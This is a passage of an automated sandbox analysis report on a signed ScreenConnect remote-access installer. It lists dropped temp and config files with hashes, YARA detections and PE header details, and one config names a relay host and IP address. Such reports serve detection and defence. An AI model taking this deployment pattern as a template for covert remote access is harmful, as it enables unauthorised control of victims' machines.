                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\p3h3t4kq.newcfg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                    Entropy (8bit):5.0135821896782335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEiBK5/vXbAa3xT:2dL9hK6E46YPEARvH
                                                                                                                                                                    MD5:18310D6528D8AABB05F6BEB3A87E42F4
                                                                                                                                                                    SHA1:0E5F5AC4AFA956B032525FA957B818BFC92B636E
                                                                                                                                                                    SHA-256:D638D3B1ED691195382A2D89328A64F69C4774112A3E46E67C68A49C23117D40
                                                                                                                                                                    SHA-512:055B0026D0F6973A9EAA01D39F0D4E6B300A535889AD1447B76F2DAB98556870BEE5D36DFC4F4A0F1F45A9B8DF892B30F73CCEC6458408C3E86BDC382D4958E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a23%3a31</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\user.config (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                    Entropy (8bit):5.0135821896782335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEiBK5/vXbAa3xT:2dL9hK6E46YPEARvH
                                                                                                                                                                    MD5:18310D6528D8AABB05F6BEB3A87E42F4
                                                                                                                                                                    SHA1:0E5F5AC4AFA956B032525FA957B818BFC92B636E
                                                                                                                                                                    SHA-256:D638D3B1ED691195382A2D89328A64F69C4774112A3E46E67C68A49C23117D40
                                                                                                                                                                    SHA-512:055B0026D0F6973A9EAA01D39F0D4E6B300A535889AD1447B76F2DAB98556870BEE5D36DFC4F4A0F1F45A9B8DF892B30F73CCEC6458408C3E86BDC382D4958E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a23%3a31</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1590
                                                                                                                                                                    Entropy (8bit):5.363907225770245
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

                                                                                                                                                                    C:\Windows\Temp\~DF01642190367FE75D.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DF61A468A6AB3D1920.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):1.4270231635734074
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
                                                                                                                                                                    SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
                                                                                                                                                                    SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
                                                                                                                                                                    SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF61A468A6AB3D1920.TMP, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DF702E679849414E1F.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):0.07719567308930654
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOqqtt8YaSKChiVky6l51:2F0i8n0itFzDHFDtR7r
                                                                                                                                                                    MD5:1965B0922E5F05902EBD5A36FA51A7EE
                                                                                                                                                                    SHA1:DA72C64B373F9E5C6FF2800577A0B35718B98316
                                                                                                                                                                    SHA-256:F083B161A780A2D9E4B04487E70C29C0F423A8CAF7F704C1F539EDD520D7F6DA
                                                                                                                                                                    SHA-512:2375BC18EEF5462771AC0E78EC4872D20F41E5F3DBFE97A3DF51BF5C53920D22713F6BC25B7E54E6FC6C6CD1E261C42B7C5A6F2B02E2600986AD3B9F74639CEC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DF8EE2806658991912.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):1.4270231635734074
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
                                                                                                                                                                    SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
                                                                                                                                                                    SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
                                                                                                                                                                    SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF8EE2806658991912.TMP, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DF9B560D31BAF08AF0.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFB02AF62F87793E12.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFB8D798BC34169319.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFCC421647BED1434B.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):1.4270231635734074
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
                                                                                                                                                                    SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
                                                                                                                                                                    SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
                                                                                                                                                                    SHA-512:40B70547E2D169ACD68A6C5F3801F5088CC317584C87DA9D1810AB6A6E758CD613C8C9BD4E9B15D8F817BD230A72F47A0F4B1C4BE232DF6DD25256A9470C9754
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCC421647BED1434B.TMP, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.8095888546286913
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:42308293DC812DF71F43C377513FDC6E
                                                                                                                                                                    SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
                                                                                                                                                                    SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
                                                                                                                                                                    SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.8095888546286913
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:42308293DC812DF71F43C377513FDC6E
                                                                                                                                                                    SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
                                                                                                                                                                    SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
                                                                                                                                                                    SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFFEA70B09147D26F1.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                    Entropy (8bit):0.23762406057162272
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:+3JvDDBAduHvlS3qcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrDV9IYI:Mpxp4fed/4G3f9FD9
                                                                                                                                                                    MD5:55E80F3956A3DC808DE23D1F2CD7AFD9
                                                                                                                                                                    SHA1:74524DF5AA9BE20BDDD3A20456C387FA3FCC86F7
                                                                                                                                                                    SHA-256:34EFC7BEBF030C967AF3616625367850771DF61A29EAFA50FA10D82724360078
                                                                                                                                                                    SHA-512:C3879FCA55A9B9CCAA12C5BCEA4434A08428F2BB7E5A43F2A67D264F9490C3B843E7F2A33E70F0F8BBBB972D4DB6B59105CDA7229657D1964D936003E81B0AF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFFEA70B09147D26F1.TMP, Author: Joe Security
                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Temp\~DFFFC708E83B5A4EC8.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.429350374393457
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:f53WqfzzNt.exe
                                                                                                                                                                    File size:5'620'624 bytes
                                                                                                                                                                    MD5:a27847506c27a6bde1a5f7d092bf29d2
                                                                                                                                                                    SHA1:5857ffbb63987615da9ea0ffc0e5564e257d7729
                                                                                                                                                                    SHA256:5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57
                                                                                                                                                                    SHA512:297c206ec0512487a141272c48b4e2d0aa2fe028ea972c914d43b0b9ff4e2305199f02ad42eb99683a457d833d192b8e26e5c50053c2fe33a4c996c00238c16a
                                                                                                                                                                    SSDEEP:49152:+EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:rEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                                                                                    TLSH:5C46E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x4014ad
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                    Import Hash:9771ee6344923fa220489ab01239bdfd

                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                    Signature Valid:true
                                                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                    Signature Validation Error:The operation completed successfully
                                                                                                                                                                    Error Number:0
                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                    • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                    Subject Chain
                                                                                                                                                                    • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                    Version:3
                                                                                                                                                                    Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                    Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                    Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                    Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    call 00007F9850E79F0Ah
                                                                                                                                                                    jmp 00007F9850E799BFh
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    call dword ptr [0040D040h]
                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                    call dword ptr [0040D03Ch]
                                                                                                                                                                    push C0000409h
                                                                                                                                                                    call dword ptr [0040D044h]
                                                                                                                                                                    push eax
                                                                                                                                                                    call dword ptr [0040D048h]
                                                                                                                                                                    pop ebp
                                                                                                                                                                    ret
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    sub esp, 00000324h
                                                                                                                                                                    push 00000017h
                                                                                                                                                                    call dword ptr [0040D04Ch]
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F9850E79B47h
                                                                                                                                                                    push 00000002h
                                                                                                                                                                    pop ecx
                                                                                                                                                                    int 29h
                                                                                                                                                                    mov dword ptr [004148D8h], eax
                                                                                                                                                                    mov dword ptr [004148D4h], ecx
                                                                                                                                                                    mov dword ptr [004148D0h], edx
                                                                                                                                                                    mov dword ptr [004148CCh], ebx
                                                                                                                                                                    mov dword ptr [004148C8h], esi
                                                                                                                                                                    mov dword ptr [004148C4h], edi
                                                                                                                                                                    mov word ptr [004148F0h], ss
                                                                                                                                                                    mov word ptr [004148E4h], cs
                                                                                                                                                                    mov word ptr [004148C0h], ds
                                                                                                                                                                    mov word ptr [004148BCh], es
                                                                                                                                                                    mov word ptr [004148B8h], fs
                                                                                                                                                                    mov word ptr [004148B4h], gs
                                                                                                                                                                    pushfd
                                                                                                                                                                    pop dword ptr [004148E8h]
                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                    mov dword ptr [004148DCh], eax
                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                    mov dword ptr [004148E0h], eax
                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                    mov dword ptr [004148ECh], eax
                                                                                                                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                    mov dword ptr [00414828h], 00010001h

                                                                                                                                                                    Rich Headers

                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                    • [IMP] VS2008 build 21022

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x16190
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
